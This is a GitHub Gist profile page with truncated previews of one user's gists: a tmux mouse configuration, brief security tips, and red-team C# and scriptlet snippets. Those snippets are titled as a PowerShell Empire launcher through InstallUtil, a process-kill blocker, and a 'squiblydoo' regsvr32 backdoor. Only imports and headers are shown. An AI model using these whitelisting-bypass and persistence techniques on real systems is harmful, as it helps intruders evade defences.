Skip to content

Instantly share code, notes, and snippets.

Avatar

Rich Moulton rhmoult

  • Red Alpha
View GitHub Profile
@rhmoult
rhmoult / .tmux.conf
Created Oct 25, 2019 — forked from paulodeleo/.tmux.conf
Tmux configuration to enable mouse scroll and mouse panel select, taken from: http://brainscraps.wikia.com/wiki/Extreme_Multitasking_with_tmux_and_PuTTY
View .tmux.conf
# Make mouse useful in copy mode
setw -g mode-mouse on
# Allow mouse to select which pane to use
set -g mouse-select-pane on
# Allow mouse dragging to resize panes
set -g mouse-resize-pane on
# Allow mouse to select windows
View free security advice.md

Simple Security Guidelines

  • Use an iDevice

    • Use an iPod or an iPad without a SIM card
    • Use an iPhone
    • Do not jailbreak
    • Always upgrade to new iOS versions
  • Use Signal (iOS + Android)

@rhmoult
rhmoult / EmpireCOMPosh.cs
Created May 23, 2016
Allows PowerShell Commands To Execute via JavaScript via COM. PowerShell without PowerShell.exe
View EmpireCOMPosh.cs
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
@rhmoult
rhmoult / ProcessArmor.cs
Created May 23, 2016
Process Armor - Prevent users from killing your service or process
View ProcessArmor.cs
using System;
using System.Diagnostics;
using System.Reflection;
using System.ComponentModel;
using System.Security.AccessControl;
using System.Security.Principal;
using System.Runtime.InteropServices;
using System.Configuration.Install;
@rhmoult
rhmoult / empire.cs
Created May 23, 2016
PowerShell Empire via InstallUtil.exe
View empire.cs
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
@rhmoult
rhmoult / Backdoor-Minimalist.sct
Created May 23, 2016
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
View Backdoor-Minimalist.sct
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[